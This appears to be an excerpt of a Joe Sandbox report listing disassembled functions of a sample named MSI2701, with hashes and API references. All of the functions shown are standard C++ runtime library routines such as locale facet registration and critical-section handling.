                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 1007100420-2395104290
                                                                                                                                                            • Opcode ID: 7f92dc5b51f1d2ab2c9cea664d6d93ed4eb2fc26ea754a285f67b2aa25a44b42
                                                                                                                                                            • Instruction ID: 379fdd2d750a5418b162ff3b19fa796a7d3209596c5e120ff3ce31117f95b0a2
                                                                                                                                                            • Opcode Fuzzy Hash: 7f92dc5b51f1d2ab2c9cea664d6d93ed4eb2fc26ea754a285f67b2aa25a44b42
                                                                                                                                                            • Instruction Fuzzy Hash: 5501AD35900159ABCB05FB669825BBEB7B1BF94714F24440FF400AB391CF789E059BAA
                                                                                                                                                            Function 004DE8D8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004DE8DF
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004DE8E9
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • messages.LIBCPMT ref: 004DE923
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004DE93A
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004DE95A
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2750803064-2395104290
                                                                                                                                                            • Opcode ID: a06337638c3d0e6ea5c71cbc533656be095a808df7f8a44f51cea668b2097411
                                                                                                                                                            • Instruction ID: d8e27570a2dc5e4a7363466b7536bafd543344dcda1ecdbfe57e5c66bf95bd9c
                                                                                                                                                            • Opcode Fuzzy Hash: a06337638c3d0e6ea5c71cbc533656be095a808df7f8a44f51cea668b2097411
                                                                                                                                                            • Instruction Fuzzy Hash: 4F01C075901129DBCB05FB628865BBE7BB0BF84714F24054FF500AB391CF789E018BAA
                                                                                                                                                            Function 004D2961 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D2968
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D2972
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • moneypunct.LIBCPMT ref: 004D29AC
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D29C3
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D29E3
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 419941038-2395104290
                                                                                                                                                            • Opcode ID: 04a003c3be2fc07628699735e7cae8a6044cc715fb00d204edb41836dc3ce709
                                                                                                                                                            • Instruction ID: dbcb79087b5d25142a45104b6bd45c76673e8caecf4d3997196ec487d52e9970
                                                                                                                                                            • Opcode Fuzzy Hash: 04a003c3be2fc07628699735e7cae8a6044cc715fb00d204edb41836dc3ce709
                                                                                                                                                            • Instruction Fuzzy Hash: F0012275A00119DBCB01EB61C826BBE77B0BF94314F24044FF4106B391CF789E008BAA
                                                                                                                                                            Function 004D29F6 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D29FD
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D2A07
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • moneypunct.LIBCPMT ref: 004D2A41
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D2A58
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D2A78
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 419941038-2395104290
                                                                                                                                                            • Opcode ID: aba92864f66d728e457fe502b76c703ad50011a97e9c45c3e59974157d33b3a5
                                                                                                                                                            • Instruction ID: b9176dcaee4b99e0cee0fe5b0cdd4a586be0bc51a22303f642d63a061970d4b6
                                                                                                                                                            • Opcode Fuzzy Hash: aba92864f66d728e457fe502b76c703ad50011a97e9c45c3e59974157d33b3a5
                                                                                                                                                            • Instruction Fuzzy Hash: 14010035800119EBCB11EB61C825BBE77B1FFA4314F24040FE400AB391CF789E028BA9
                                                                                                                                                            Function 004D2A8B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D2A92
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D2A9C
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • moneypunct.LIBCPMT ref: 004D2AD6
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D2AED
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D2B0D
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 419941038-2395104290
                                                                                                                                                            • Opcode ID: 3d982408c76a0fa0f52c249852b7dc3ad2ca0c2779144410f8029aaf7f0f588a
                                                                                                                                                            • Instruction ID: fdfe2ac13d3987413f61b5d3b312d68ad5250d8d32ef27b51e67d44b08214318
                                                                                                                                                            • Opcode Fuzzy Hash: 3d982408c76a0fa0f52c249852b7dc3ad2ca0c2779144410f8029aaf7f0f588a
                                                                                                                                                            • Instruction Fuzzy Hash: D501E1359001199BCB11EF618915BBE77B0BF90314F24484FF500A7392CFB8AE01CBA9
                                                                                                                                                            Function 004DEA97 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004DEA9E
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004DEAA8
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • moneypunct.LIBCPMT ref: 004DEAE2
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004DEAF9
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004DEB19
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 419941038-2395104290
                                                                                                                                                            • Opcode ID: 2572c96af1777340a9c730dc1d36ed599a5ca70939a326b64b62c189a1328720
                                                                                                                                                            • Instruction ID: 0ba90525fb2e2a3000f7224f57e0db73a5ec41aba6b6f39709dfa2ab8196a919
                                                                                                                                                            • Opcode Fuzzy Hash: 2572c96af1777340a9c730dc1d36ed599a5ca70939a326b64b62c189a1328720
                                                                                                                                                            • Instruction Fuzzy Hash: D201AD359001299FCB15FB629855ABE77B1BF94724F24080FE4016B392DF78AE018BA9
                                                                                                                                                            Function 004DEB2C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004DEB33
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004DEB3D
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • moneypunct.LIBCPMT ref: 004DEB77
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004DEB8E
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004DEBAE
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 419941038-2395104290
                                                                                                                                                            • Opcode ID: 91b88157c82e261bb5fc9b906a1fc48330782208f9f5c82758c70f8aba52a0d6
                                                                                                                                                            • Instruction ID: fec1e0981bb15b9fb102d1443606d97ce1e107a592469b2505b20d0b407dfe23
                                                                                                                                                            • Opcode Fuzzy Hash: 91b88157c82e261bb5fc9b906a1fc48330782208f9f5c82758c70f8aba52a0d6
                                                                                                                                                            • Instruction Fuzzy Hash: 9701E135800115DBCB05EB6288A5BBE77B0BF44314F24440FE4016B391CF78AE058B99
                                                                                                                                                            Function 004D2B20 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D2B27
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D2B31
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • moneypunct.LIBCPMT ref: 004D2B6B
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D2B82
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D2BA2
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 419941038-2395104290
                                                                                                                                                            • Opcode ID: d049a9777d17fe99a3d1200db10bbf4e0374dad5a8d331fe20dc8762ab5f4f1d
                                                                                                                                                            • Instruction ID: d01ddcbe58028091d4beb97f947488bb6ebde21eba78da46732faff798e89e6e
                                                                                                                                                            • Opcode Fuzzy Hash: d049a9777d17fe99a3d1200db10bbf4e0374dad5a8d331fe20dc8762ab5f4f1d
                                                                                                                                                            • Instruction Fuzzy Hash: 3801E135900219EBCB15EF618915BBE7BB0BF94724F24040FE5006B392CFB8AE008799
                                                                                                                                                            Function 004D2D74 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D2D7B
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D2D85
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • numpunct.LIBCPMT ref: 004D2DBF
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D2DD6
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D2DF6
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 743221004-2395104290
                                                                                                                                                            • Opcode ID: a3316a8d6999ab8e3af0dc61ec8fe71ef6ed6d33270720f8b1a69cf264d67f64
                                                                                                                                                            • Instruction ID: 89dd9bb5ebed44b8a3d999f539dffbdcd92cfcd10fcccc3ea36775706b200c0a
                                                                                                                                                            • Opcode Fuzzy Hash: a3316a8d6999ab8e3af0dc61ec8fe71ef6ed6d33270720f8b1a69cf264d67f64
                                                                                                                                                            • Instruction Fuzzy Hash: 5201C4359001559BCB05EB61D915BBE77B2BF94714F24044FE41067391CF789E01D799
                                                                                                                                                            Function 004F2DEE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,C7C71CC4,0000000C,?,00000000,00506A6C,000000FF,?,004F2DC1,?,?,004F2D95,?), ref: 004F2E23
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004F2E35
                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,00506A6C,000000FF,?,004F2DC1,?,?,004F2D95,?), ref: 004F2E57
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                            • String ID: 2N$CorExitProcess$mscoree.dll
                                                                                                                                                            • API String ID: 4061214504-2377061492
                                                                                                                                                            • Opcode ID: 08f697bdea1ef9a764213fef1b45acc2683c550f65f74b364ee4c750d60f65f0
                                                                                                                                                            • Instruction ID: f7258a5cb67cd0d93b41cea9bddce3e8a499a0576a9c0c6c4b211e076ee9e4a0
                                                                                                                                                            • Opcode Fuzzy Hash: 08f697bdea1ef9a764213fef1b45acc2683c550f65f74b364ee4c750d60f65f0
                                                                                                                                                            • Instruction Fuzzy Hash: 4201A73590861DEBCB128F40CC05FAFBBB8FB08B10F004525F811A22E0D7B49904CA90
                                                                                                                                                            Function 004E2C4E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • EnterCriticalSection.KERNEL32(0051DD3C,?,?,004C2427,0051E638,00506B40), ref: 004E2C58
                                                                                                                                                            • LeaveCriticalSection.KERNEL32(0051DD3C,?,?,004C2427,0051E638,00506B40), ref: 004E2C8B
                                                                                                                                                            • RtlWakeAllConditionVariable.NTDLL ref: 004E2D02
                                                                                                                                                            • SetEvent.KERNEL32(?,004C2427,0051E638,00506B40), ref: 004E2D0C
                                                                                                                                                            • ResetEvent.KERNEL32(?,004C2427,0051E638,00506B40), ref: 004E2D18
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 3916383385-2395104290
                                                                                                                                                            • Opcode ID: ee6c86bf9664eae13596fb9ed105b12835c21bad043dd1bfdafc9507c42ec1e1
                                                                                                                                                            • Instruction ID: 8415398e5aa4370d908adc8f90fc4b76af3fbcd3a1f89e7655dfca70af265a02
                                                                                                                                                            • Opcode Fuzzy Hash: ee6c86bf9664eae13596fb9ed105b12835c21bad043dd1bfdafc9507c42ec1e1
                                                                                                                                                            • Instruction Fuzzy Hash: D9014671A04664EFC711AF18FC08ED97BB5FB6D341700446AF90283320CB756845EBA0
                                                                                                                                                            Function 004CB500 Relevance: 9.2, APIs: 6, Instructions: 151memoryCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004CB531
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004CB54F
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004CB577
                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,0000000C,00000000,C7C71CC4,?,00000000,00000000), ref: 004CB5CF
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004CB6B7
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004CB6E1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3931714976-0
                                                                                                                                                            • Opcode ID: 8c876959ffdecb9901652edabfabc6dc6757b119837912fb8aa940f409e6fecf
                                                                                                                                                            • Instruction ID: 48f57fa7160d0d0d6226e11ad320411af0c3a369bddbc67992652a5df36fd71f
                                                                                                                                                            • Opcode Fuzzy Hash: 8c876959ffdecb9901652edabfabc6dc6757b119837912fb8aa940f409e6fecf
                                                                                                                                                            • Instruction Fuzzy Hash: 9B51D475900208DFDB11CF58C881BAEBBB4FF24318F24855EE815AB391D7B99A05CBC6
                                                                                                                                                            Function 004CB700 Relevance: 9.1, APIs: 6, Instructions: 128memoryCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004CB731
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004CB74F
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004CB777
                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000008,00000000,C7C71CC4,?,00000000,00000000), ref: 004CB7CF
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004CB863
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004CB88D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3931714976-0
                                                                                                                                                            • Opcode ID: 98fa13789e6d3dbb7492483d6ba2827f61428ddb3922e3c6f8677df02123b13b
                                                                                                                                                            • Instruction ID: 72271821f6586bcf84f10b479278e90f85a580a9c5669354fbf6dd9e6b620283
                                                                                                                                                            • Opcode Fuzzy Hash: 98fa13789e6d3dbb7492483d6ba2827f61428ddb3922e3c6f8677df02123b13b
                                                                                                                                                            • Instruction Fuzzy Hash: BA51CC78901214DFCB15CF98C992B9EBBB4FB14314F24815EE841AB381D779AE04CBD4
                                                                                                                                                            Function 004F0351 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 369COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
